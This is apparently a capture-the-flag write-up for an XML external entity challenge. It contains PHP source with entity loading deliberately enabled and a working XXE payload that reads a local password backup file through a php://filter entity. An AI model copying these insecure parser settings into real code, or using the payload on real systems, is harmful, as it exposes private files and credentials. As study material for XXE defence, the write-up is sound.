xml === [toc] ## source ### index.php ```php= <?php error_reporting(0); // highlight_file(__FILE__); libxml_disable_entity_loader (false); $xmlfile = $_POST["data"]; if ($_POST != []){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); // echo $creds; if ($creds->encode == "true"){ echo "<textarea rows=\"10\" cols=\"50\">".base64_encode($creds->data)."</textarea>"; } else { echo "<textarea rows=\"10\" cols=\"50\">".base64_decode($creds->data)."</textarea>"; } } ?> <html> <h1>encode</h1> <form action="/" method="POST"> <textarea rows="5" cols="50" name="data"><?xml version="1.0" encoding="utf-8"?><base64><encode>true</encode><data>123456</data></base64></textarea> <input type="submit" value="encode it!"> </form> <h1>decode</h1> <form action="/" method="POST"> <textarea rows="5" cols="50" name="data"><?xml version="1.0" encoding="utf-8"?><base64><encode>false</encode><data>MTIzNDU2</data></base64></textarea> <input type="submit" value="decode it!"> </form> </html> ``` ### robots.txt ```txt= # robots.txt for xml_atk # remember backup is here {{{{C:\\backup\pa55word_backup.QAQ.txt}}} User-Agent: * Disallow: /*/ ``` ## payload ```xml= <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [ <!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/backup/pa55word_backup.QAQ.txt"> ]> <base64> <encode>false</encode> <data>&goodies;</data> </base64> ``` ## refer https://xz.aliyun.com/t/3357 https://github.com/payloadbox/xxe-injection-payload-list